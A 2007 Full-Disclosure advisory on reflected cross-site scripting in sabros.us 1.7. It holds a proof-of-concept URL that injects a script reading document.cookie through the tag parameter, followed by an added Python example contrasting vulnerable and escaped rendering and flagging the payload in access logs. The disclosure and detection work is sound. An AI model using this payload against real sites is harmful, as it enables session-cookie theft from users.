[Full-disclosure] [x0ne-h4ck] sabros.us 1.7 XSS Exploit

corrado.liotta at alice.it corrado.liotta at alice.it
Thu Jan 18 19:18:57 GMT 2007


-=[--------------------ADVISORY-------------------]=-

                        sabros.us 1.7

  Author: CorryL    [corryl80 at gmail.com]
-=[-----------------------------------------------]=-


-=[+] Application:    sabros.us
-=[+] Version:        1.7
-=[+] Vendor's URL:   http://sourceforge.net/projects/sabrosus/
-=[+] Platform:       Windows\Linux\Unix
-=[+] Bug type:       Cross-Site Scripting (reflected)
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:         CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:      www.x0n3-h4ck.org
-=[+] Virtual Office: http://www.kasamba.com/CorryL
-=[+] Irc Chan:       irc.darksin.net #x0n3-h4ck


..::[ Description ]::..

sabros.us is a CMS for putting your bookmarks online with folksonomy support,
just like del.icio.us, but with the big difference that you have complete
control of the source code. It is written in PHP with MySQL as the backend,
which makes it cross-platform.


..::[ Proof Of Concept ]::..

http://remote-server/index.php?tag=</title><script>alert(document.cookie)</script>
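The proof of concept works because the `tag` query parameter is reflected unescaped inside the page's `<title>` element, so a value containing `</title>` closes that element and anything after it is parsed as markup. The following Python is an added example, not sabros.us code and not part of the original advisory: the template string is an assumption about how the page interpolates the parameter, it contrasts the unescaped rendering with an HTML-escaped one, and it runs a context-aware check over two constructed access-log lines (one of which carries the advisory's own PoC URL) to show how the attempt can be spotted in web-server logs.

```python
"""Reflected XSS in a <title> context: vulnerable vs. escaped rendering,
plus a log check. Added example; the template and log lines are constructed
and do not come from the sabros.us code base."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Assumed page skeleton: the tag is interpolated into the <title> text.
PAGE_TEMPLATE = (
    "<html><head><title>Bookmarks tagged: {tag}</title></head>"
    "<body></body></html>"
)


def render_vulnerable(tag: str) -> str:
    """Reflects the parameter verbatim, the pattern the PoC relies on."""
    return PAGE_TEMPLATE.format(tag=tag)


def render_fixed(tag: str) -> str:
    """Escapes the parameter for an HTML text context before interpolation.
    '<' becomes '&lt;', so '</title>' and '<script>' never reach the
    parser as tags."""
    return PAGE_TEMPLATE.format(tag=html.escape(tag, quote=True))


class _ScriptCounter(HTMLParser):
    """Counts <script> start tags the way a browser would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0

    def handle_starttag(self, tag, attrs) -> None:
        if tag == "script":
            self.script_tags += 1


def count_script_tags(page: str) -> int:
    parser = _ScriptCounter()
    parser.feed(page)
    parser.close()
    return parser.script_tags


# Any decoded parameter value that opens or closes an HTML tag is suspect;
# a legitimate tag name ("php", "c++") never contains '<' + letter.
TAG_BREAKOUT = re.compile(r"<\s*/?\s*[a-zA-Z]")


def suspicious_params(request_uri: str) -> list:
    """Returns (name, decoded value) pairs whose value contains tag syntax."""
    qs = parse_qs(urlsplit(request_uri).query, keep_blank_values=True)
    return [(k, v) for k, vals in qs.items() for v in vals if TAG_BREAKOUT.search(v)]


# Constructed Apache-style access log: one benign request, one PoC attempt.
ACCESS_LOG = """\
203.0.113.5 - - [18/Jan/2007:19:18:57 +0000] "GET /index.php?tag=php HTTP/1.1" 200 1532
203.0.113.7 - - [18/Jan/2007:19:19:02 +0000] "GET /index.php?tag=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 1601
"""

LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def flag_log(log_text: str) -> list:
    """Returns one dict per log line whose query string contains tag syntax."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, ts, method, uri, status = m.groups()
        bad = suspicious_params(uri)
        if bad:
            hits.append({"client": client, "time": ts, "uri": uri, "params": bad})
    return hits


if __name__ == "__main__":
    payload = "</title><script>alert(document.cookie)</script>"
    print("script tags, vulnerable:", count_script_tags(render_vulnerable(payload)))
    print("script tags, fixed:     ", count_script_tags(render_fixed(payload)))
    for hit in flag_log(ACCESS_LOG):
        print("suspicious request from", hit["client"], hit["params"])
```

The detection is deliberately context-aware rather than a signature for `alert(`: it decodes the query string first (the PoC arrives percent-encoded on the wire) and flags any value that contains tag syntax at all, which also catches variants that use a different element or event handler. The fix side is the standard one, escape on output for the context the value lands in; `html.escape` is correct for element text such as `<title>`, but a value placed inside an attribute or a script block would need escaping for that context instead.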




Full-Disclosure is hosted and sponsored by Secunia.